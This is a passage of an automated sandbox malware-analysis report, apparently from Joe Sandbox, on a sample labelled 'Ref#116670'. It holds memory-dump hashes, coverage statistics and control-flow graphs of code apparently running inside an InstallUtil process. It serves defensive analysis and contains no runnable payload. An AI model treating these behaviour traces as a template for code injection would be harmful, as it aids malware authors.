                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a2b5b25bc70170c24cf796aaf0cf529b1ff777fafc50c9ae865e722abe322f25
                                                                                                                                  • Instruction ID: c9f181bd704c64f3297e4c2c651d0edb67e05fa1acae8064e50105591c387392
                                                                                                                                  • Opcode Fuzzy Hash: a2b5b25bc70170c24cf796aaf0cf529b1ff777fafc50c9ae865e722abe322f25
                                                                                                                                  • Instruction Fuzzy Hash: AF914AB4E04208CFEB44EFA9E544BEEB7F2EB89300F509529E01AAB395CB745941CF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 643a0d7d46b2c681ab3ec0b7c0871afa7b2a27536b2cd2bcc14a502fa6e015ed
                                                                                                                                  • Instruction ID: d8af8a75c08ef37fb1f6fa60278ad1c84221d0811fe48cd87756904bf882688e
                                                                                                                                  • Opcode Fuzzy Hash: 643a0d7d46b2c681ab3ec0b7c0871afa7b2a27536b2cd2bcc14a502fa6e015ed
                                                                                                                                  • Instruction Fuzzy Hash: A89149B4E04208CFEB44EFAAD544BEEB7F6EB89300F509529E00AAB395DB745941CF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 916d4d8150a5173973b53cb88d427dd72b9629539a9e9ebd4616b8c718f23406
                                                                                                                                  • Instruction ID: 4841105d95c5231dc16607280379ace3a05ccbdc57c8321e529260e8af6ce9b6
                                                                                                                                  • Opcode Fuzzy Hash: 916d4d8150a5173973b53cb88d427dd72b9629539a9e9ebd4616b8c718f23406
                                                                                                                                  • Instruction Fuzzy Hash: EA913970E08208CFEB94EF68E444BAEB7F2FB4A301F509469D05AAB395DB745985CF40
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271492048.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6d70000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d6f3ee17f7eea57445b1bb921e47b0f033620bba77d50cc84bf288798c58c596
                                                                                                                                  • Instruction ID: 9d8928bd8967fc240f76f7e5dfccb55dbaa9d0c2463749e1364fbb111d37d270
                                                                                                                                  • Opcode Fuzzy Hash: d6f3ee17f7eea57445b1bb921e47b0f033620bba77d50cc84bf288798c58c596
                                                                                                                                  • Instruction Fuzzy Hash: 49911C70D05218CFEBA4EF69C848BADBBF2FF49304F1484A9D449AB290DB749985CF41
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270835574.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_68d0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 77361a26b75ad4201b3efda0b4c4e9599eff485f5814051df35d9ef60cde7883
                                                                                                                                  • Instruction ID: 4fffb20595c16a738c66360708abbec573da914a10ed897018283071542f1993
                                                                                                                                  • Opcode Fuzzy Hash: 77361a26b75ad4201b3efda0b4c4e9599eff485f5814051df35d9ef60cde7883
                                                                                                                                  • Instruction Fuzzy Hash: 46812670E05218DFEB64CF69D845BADBBF2BF4A308F1090AAD088EB255DB745985CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264799606.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cd0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: cb2f3a40c49757b0f68a86c3a9cde4bdf37c7920c07dfd9b4583f80ed7aff998
                                                                                                                                  • Instruction ID: aa047ff5e20604cf7fa94d39801df9b0ff049dae7410afeb48af2e7af9852627
                                                                                                                                  • Opcode Fuzzy Hash: cb2f3a40c49757b0f68a86c3a9cde4bdf37c7920c07dfd9b4583f80ed7aff998
                                                                                                                                  • Instruction Fuzzy Hash: 1B71E5B0E04218CBEB64DF66D944BEEFBF2BB45300F1195AAC50AB7251DB741A84CF60
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270835574.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_68d0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f79478c3435781c47b18527fb8bdedf2ed2732b2baeb276f9fadbfc49dab36c4
                                                                                                                                  • Instruction ID: 188f740ceea2c304e1b7ea3ab2806119e5359d8f93406e666984bb21f3aeaf80
                                                                                                                                  • Opcode Fuzzy Hash: f79478c3435781c47b18527fb8bdedf2ed2732b2baeb276f9fadbfc49dab36c4
                                                                                                                                  • Instruction Fuzzy Hash: 06710174D05258CFEB64CF6AC9447DDBBF2AB89314F00C0AAC549AB251E7744A89CF60
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264799606.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cd0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 685417349f25021cf0425d6cd13daa9cb25c51dfea73cc9bb9654fc083ce4107
                                                                                                                                  • Instruction ID: d8bbfdc1297e098f03265a3a618ce672eccba8c1219e77ee9a313f269297417d
                                                                                                                                  • Opcode Fuzzy Hash: 685417349f25021cf0425d6cd13daa9cb25c51dfea73cc9bb9654fc083ce4107
                                                                                                                                  • Instruction Fuzzy Hash: BF61E5B0D04258CFEB64DF66D944BEEBBF2BB85300F1095AAC50AB7251DB741A85CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e29858286043a3024fc8f4d06c5b1bcd3089975ea001ea8c34954c7db40f3d96
                                                                                                                                  • Instruction ID: 9930d042ca9443b205131962cbc1209d0c49d9fb2b37eeeedc3d051ff377dd3e
                                                                                                                                  • Opcode Fuzzy Hash: e29858286043a3024fc8f4d06c5b1bcd3089975ea001ea8c34954c7db40f3d96
                                                                                                                                  • Instruction Fuzzy Hash: 7B5127B0D05608CFEF54EFA9E4447EDBBF2EB89310F14902AD509AB294D7385946CF49
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 683ca212c2e06c32da064f4b9f3ada915fccaa19b1b3be51b6402b03efb383f4
                                                                                                                                  • Instruction ID: 1e257caad0cfaf180c51a35e1504737a0257e46d38284eb566f3c81f1955b600
                                                                                                                                  • Opcode Fuzzy Hash: 683ca212c2e06c32da064f4b9f3ada915fccaa19b1b3be51b6402b03efb383f4
                                                                                                                                  • Instruction Fuzzy Hash: 145105B0D05208CFEF54EFA9E5447EDBBF6EB89310F10902AD409AB294D7785945CF89
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270835574.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_68d0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1cf31ec778b85f46833c68e21aa5e55d5f2769ad6f487ba4196d6515e3a9d4cc
                                                                                                                                  • Instruction ID: 89a19d3f66583a3e068105d1527efa1b9e095ce2ddd45343a6d25084ea1640fc
                                                                                                                                  • Opcode Fuzzy Hash: 1cf31ec778b85f46833c68e21aa5e55d5f2769ad6f487ba4196d6515e3a9d4cc
                                                                                                                                  • Instruction Fuzzy Hash: 5251D474D45268DFEB64CF6AC9447DDBBF2AB88304F00C0AAD509A7255DB744E84CF60
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270835574.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_68d0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2f5aeb372512c7dd11d89e50baa133ff1f07213a0c64bcb83a54d7b238afb7a6
                                                                                                                                  • Instruction ID: 8431a2e2d59d9159d0948fa6bc525a55211856a401b19853ff32a4296aa922a0
                                                                                                                                  • Opcode Fuzzy Hash: 2f5aeb372512c7dd11d89e50baa133ff1f07213a0c64bcb83a54d7b238afb7a6
                                                                                                                                  • Instruction Fuzzy Hash: 5A51A9B1E05A188BEB58CF6BDC4069EFBF3AFC9301F14C1B98858AA255DB344946CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271312582.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6ac0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 493ef072306738c1a3aefc8795f4c5118aec8d1ea120918e10d534b24e5c9291
                                                                                                                                  • Instruction ID: 5c729660b1341637d0f68127e6bd6caddf78817ff7a4b84c0bc6071b58cb83ce
                                                                                                                                  • Opcode Fuzzy Hash: 493ef072306738c1a3aefc8795f4c5118aec8d1ea120918e10d534b24e5c9291
                                                                                                                                  • Instruction Fuzzy Hash: 125170B1D056588BE769CF2B8D442C6FAF3AFC9310F04C1FA954CAA165EB740AC68F51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270835574.00000000068D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_68d0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0f4ca8c4a01aece49b90e3f3a1fc84e4d304f660b3babf480ff57860e00b7b74
                                                                                                                                  • Instruction ID: 2860ae04c6598161eb987bf31502acda823dcd12015905b2357886e436c1d1d1
                                                                                                                                  • Opcode Fuzzy Hash: 0f4ca8c4a01aece49b90e3f3a1fc84e4d304f660b3babf480ff57860e00b7b74
                                                                                                                                  • Instruction Fuzzy Hash: 2E5156B1E016599BDB18CFABD94059EFBF3BFC8300F14C06AD958AB224EB3059468F54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271312582.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6ac0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 51f4e99bfdf185241172d4c62f3899e9e29b88dd93d685d58605ee450368db94
                                                                                                                                  • Instruction ID: cba713108f646e4c23061a03cbbf3fa90ee5634f1555d36b205056aee4a7e86a
                                                                                                                                  • Opcode Fuzzy Hash: 51f4e99bfdf185241172d4c62f3899e9e29b88dd93d685d58605ee450368db94
                                                                                                                                  • Instruction Fuzzy Hash: 63514EB1D056688BEB68CF1B8D447CAFAF7AFC8301F04C1FA954CA6214DB744AC58E51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d01c5fe12641b6fa2523debcb5e3b633a574996f84831fb8764449bc8cb196ec
                                                                                                                                  • Instruction ID: 40e99b0cdd9f15516cc7c9dc6891cf1179d317d1fd7d5556ad9ec9391008c57c
                                                                                                                                  • Opcode Fuzzy Hash: d01c5fe12641b6fa2523debcb5e3b633a574996f84831fb8764449bc8cb196ec
                                                                                                                                  • Instruction Fuzzy Hash: 793108B0D05618CBEB58CF9AE844BDDFBF6BF88314F04C16AD409AB254D77509898F50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270471714.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6810000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b9afd99ab8383feb0939fb1c7de6ac926f2c2fec59146c220a8ee4fa20ab5276
                                                                                                                                  • Instruction ID: 268fce84136077b316ab9c540650219a3b448326212f0846cd7bd5a850529723
                                                                                                                                  • Opcode Fuzzy Hash: b9afd99ab8383feb0939fb1c7de6ac926f2c2fec59146c220a8ee4fa20ab5276
                                                                                                                                  • Instruction Fuzzy Hash: 233143B0D05628CBEB68CF6BCC4979AFAF6AFC9305F14C1A9844CA6254EB750985CE41
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271492048.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6d70000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f4e0f30b04bd89391ded7719cf5205fd9c934f36f530a6591c2d08c602e53114
                                                                                                                                  • Instruction ID: b2f7a0f099fbde5cb2724d72b09684eeb806ae057e234e8b7eb4877b9fb3b75a
                                                                                                                                  • Opcode Fuzzy Hash: f4e0f30b04bd89391ded7719cf5205fd9c934f36f530a6591c2d08c602e53114
                                                                                                                                  • Instruction Fuzzy Hash: B131DD71E046198FDB68CF1AC884799FAF6AF88304F04C5FA980CA7255D7705A85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8f07329ec11ce646e15819eba1ca7b1ad9394c4ed7b998a21684258ec4cb7db1
                                                                                                                                  • Instruction ID: 361b13e311bf7dbb679f169b935d17d163b662f27acab37f3183e9a3aeae9178
                                                                                                                                  • Opcode Fuzzy Hash: 8f07329ec11ce646e15819eba1ca7b1ad9394c4ed7b998a21684258ec4cb7db1
                                                                                                                                  • Instruction Fuzzy Hash: 0031F8B0D05618CBEB58CF9AE8447DDFBF6BF88314F04C16AD409AB254D77449898F50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270471714.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6810000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d1ab220d4da3d80cfbf210d566dcaac8785c2cc8b48efd97f28ccb1c5da195a5
                                                                                                                                  • Instruction ID: 7fb61b21bc003269e9a9870f4d87072c51411d5ad7c4e2bb884426ba0882bd18
                                                                                                                                  • Opcode Fuzzy Hash: d1ab220d4da3d80cfbf210d566dcaac8785c2cc8b48efd97f28ccb1c5da195a5
                                                                                                                                  • Instruction Fuzzy Hash: FF3186B1D056188BEB68CF6BCD5938EFAF6AFC5304F14C1A9C448AA264EB750985CF41
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271492048.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6d70000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4d26de1b60e3145e09439604e13d2349627d9a05274a68b4025f8dcd7a000cfa
                                                                                                                                  • Instruction ID: 981dfffe69dd544422994a602cf4da738c1d746cb37ffc464ded0ca767296e19
                                                                                                                                  • Opcode Fuzzy Hash: 4d26de1b60e3145e09439604e13d2349627d9a05274a68b4025f8dcd7a000cfa
                                                                                                                                  • Instruction Fuzzy Hash: 0C21EAB1D056658BEB68CF2BC84479AFAF7AFC8300F04C4FA944CA6255EB700AD59F51
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (aq$4']q$4']q$4']q$4']q$paq
                                                                                                                                  • API String ID: 0-463314800
                                                                                                                                  • Opcode ID: 15bf3ae214648785e43759c2af6243ba7cfd3b9b89543e7dec92ffdfed007148
                                                                                                                                  • Instruction ID: 19072944ab8777a2b25b9a59ad518b0c683eb46d9ed9bdfdb72e33399e7c3b8b
                                                                                                                                  • Opcode Fuzzy Hash: 15bf3ae214648785e43759c2af6243ba7cfd3b9b89543e7dec92ffdfed007148
                                                                                                                                  • Instruction Fuzzy Hash: 6551C330B802099FC748EF6999507AEBBFBBFC8300F10886C91469B255DF789906C7A1

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:15%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:12.1%
                                                                                                                                  Total number of Nodes:33
                                                                                                                                  Total number of Limit Nodes:4
                                                                                                                                  execution_graph 9478 128ca90 9479 128cabd 9478->9479 9481 128e99f 9479->9481 9483 128cdc6 9479->9483 9484 128c148 9479->9484 9482 128c148 LdrInitializeThunk 9482->9483 9483->9481 9483->9482 9485 128c15a 9484->9485 9486 128c15f 9484->9486 9485->9483 9486->9485 9487 128c889 LdrInitializeThunk 9486->9487 9487->9485 9488 1284560 9489 128456c 9488->9489 9492 1284b45 9489->9492 9493 1284b6c 9492->9493 9497 1284d78 9493->9497 9503 1284d88 9493->9503 9494 128459b 9498 1284d44 9497->9498 9499 1284d86 9497->9499 9498->9494 9500 1284e76 9499->9500 9501 128c148 LdrInitializeThunk 9499->9501 9508 128c74c 9499->9508 9500->9494 9501->9500 9504 1284daa 9503->9504 9505 1284e76 9504->9505 9506 128c148 LdrInitializeThunk 9504->9506 9507 128c74c 2 API calls 9504->9507 9505->9494 9506->9505 9507->9505 9512 128c603 9508->9512 9509 128c744 LdrInitializeThunk 9511 128c8a1 9509->9511 9511->9500 9512->9509 9513 128c148 LdrInitializeThunk 9512->9513 9513->9512 9514 128f7b3 9517 128f677 9514->9517 9515 128f76a KiUserExceptionDispatcher 9516 128f75b 9515->9516 9517->9515 9517->9516

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1512 128c148-128c158 1513 128c15a 1512->1513 1514 128c15f-128c16b 1512->1514 1515 128c28b-128c295 1513->1515 1517 128c16d 1514->1517 1518 128c172-128c187 1514->1518 1517->1515 1521 128c29b-128c2db call 1285ce8 1518->1521 1522 128c18d-128c198 1518->1522 1538 128c2e2-128c358 call 1285ce8 call 1285be0 1521->1538 1525 128c19e-128c1a5 1522->1525 1526 128c296 1522->1526 1528 128c1d2-128c1dd 1525->1528 1529 128c1a7-128c1be 1525->1529 1526->1521 1533 128c1ea-128c1f4 1528->1533 1534 128c1df-128c1e7 1528->1534 1529->1538 1539 128c1c4-128c1c7 1529->1539 1544 128c1fa-128c204 1533->1544 1545 128c27e-128c283 1533->1545 1534->1533 1573 128c35a-128c397 1538->1573 1574 128c3bf-128c434 call 1285c88 1538->1574 1539->1526 1543 128c1cd-128c1d0 1539->1543 1543->1528 1543->1529 1544->1526 1549 128c20a-128c226 1544->1549 1545->1515 1555 128c228 1549->1555 1556 128c22a-128c22d 1549->1556 1555->1515 1558 128c22f-128c232 1556->1558 1559 128c234-128c237 1556->1559 1561 128c23a-128c248 1558->1561 1559->1561 1561->1526 1566 128c24a-128c251 1561->1566 1566->1515 1567 128c253-128c259 1566->1567 1567->1526 1569 128c25b-128c260 1567->1569 1569->1526 1570 128c262-128c275 1569->1570 1570->1526 1575 128c277-128c27a 1570->1575 1576 128c399 1573->1576 1577 128c39e-128c3bc 1573->1577 1581 128c4d3-128c4d9 1574->1581 1575->1567 1580 128c27c 1575->1580 1576->1577 1577->1574 1580->1515 1582 128c439-128c44c 1581->1582 1583 128c4df-128c4f7 1581->1583 1584 128c44e 1582->1584 1585 128c453-128c4a4 1582->1585 1586 128c4f9-128c506 1583->1586 1587 128c50b-128c51e 1583->1587 1584->1585 1605 128c4a6-128c4b4 1585->1605 1606 128c4b7-128c4c9 1585->1606 1588 128c8a1-128c99f 1586->1588 1589 128c520 1587->1589 1590 128c525-128c541 1587->1590 1595 128c9a1-128c9a6 call 1285c88 1588->1595 1596 128c9a7-128c9b1 1588->1596 1589->1590 1592 128c548-128c56c 1590->1592 1593 128c543 1590->1593 1600 128c56e 1592->1600 1601 128c573-128c5a5 1592->1601 1593->1592 1595->1596 1600->1601 1610 128c5ac-128c5ee 1601->1610 1611 128c5a7 1601->1611 1605->1583 1607 128c4cb 1606->1607 1608 128c4d0 1606->1608 1607->1608 1608->1581 1613 128c5f0 1610->1613 1614 128c5f5-128c5fe 1610->1614 1611->1610 1613->1614 1615 128c826-128c82c 1614->1615 1616 128c832-128c845 1615->1616 1617 128c603-128c628 1615->1617 1620 128c84c-128c867 1616->1620 1621 128c847 1616->1621 1618 128c62a 1617->1618 1619 128c62f-128c666 1617->1619 1618->1619 1629 128c668 1619->1629 1630 128c66d-128c69f 1619->1630 1622 128c869 1620->1622 1623 128c86e-128c882 1620->1623 1621->1620 1622->1623 1627 128c889-128c89f LdrInitializeThunk 1623->1627 1628 128c884 1623->1628 1627->1588 1628->1627 1629->1630 1632 128c6a1-128c6c6 1630->1632 1633 128c703-128c716 1630->1633 1636 128c6c8 1632->1636 1637 128c6cd-128c6fb 1632->1637 1634 128c718 1633->1634 1635 128c71d-128c742 1633->1635 1634->1635 1640 128c751-128c789 1635->1640 1641 128c744-128c745 1635->1641 1636->1637 1637->1633 1642 128c78b 1640->1642 1643 128c790-128c7f1 call 128c148 1640->1643 1641->1616 1642->1643 1649 128c7f8-128c81c 1643->1649 1650 128c7f3 1643->1650 1653 128c81e 1649->1653 1654 128c823 1649->1654 1650->1649 1653->1654 1654->1615
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.3286215745.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1280000_InstallUtil.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 690435f1e6e3067875618023f1489337263ba2db5b7399e413a73ebca5cd1bf1
                                                                                                                                  • Instruction ID: c4320f210f23b4e6e0c87ddf98204f9fe9cc3a7f13e06093f5e5415de4815dc6
                                                                                                                                  • Opcode Fuzzy Hash: 690435f1e6e3067875618023f1489337263ba2db5b7399e413a73ebca5cd1bf1
                                                                                                                                  • Instruction Fuzzy Hash: 45223A74E11219CFDB15EFA8C884B9DBBB2BF88300F5485A9D409AB395DB349D85CF60

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1655 128f58e-128f591 1656 128f608-128f609 1655->1656 1657 128f593-128f5b7 call 128f430 1655->1657 1659 128f60b-128f636 1656->1659 1660 128f637-128f63d 1656->1660 1657->1656 1659->1660 1662 128f63f-128f642 1660->1662 1663 128f644-128f6ab call 1285c88 1660->1663 1662->1663 1672 128f735-128f73b 1663->1672 1673 128f6b0-128f6c3 1672->1673 1674 128f741-128f759 1672->1674 1675 128f6ca-128f706 1673->1675 1676 128f6c5 1673->1676 1677 128f76a-128f78a KiUserExceptionDispatcher 1674->1677 1678 128f75b-128f768 1674->1678 1688 128f708-128f716 1675->1688 1689 128f719-128f72b 1675->1689 1676->1675 1679 128f78c-128f868 1677->1679 1678->1679 1682 128f86a-128f86f call 1285c88 1679->1682 1683 128f870-128f879 1679->1683 1682->1683 1688->1674 1692 128f72d 1689->1692 1693 128f732 1689->1693 1692->1693 1693->1672
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.3286215745.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1280000_InstallUtil.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 898e465d22e561c8ef81dc1b0058146217f64882ed9cc560140e21ee4c6ca684
                                                                                                                                  • Instruction ID: e86c137f4e482d9d169c14ede7465f93f06af2b2a724b1f88bc63692451d95da
                                                                                                                                  • Opcode Fuzzy Hash: 898e465d22e561c8ef81dc1b0058146217f64882ed9cc560140e21ee4c6ca684
                                                                                                                                  • Instruction Fuzzy Hash: 0A5168B1D222188FDB08EFAAD9446DDBBB2FF88314F14C22AD414AB395D7749846CF50

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
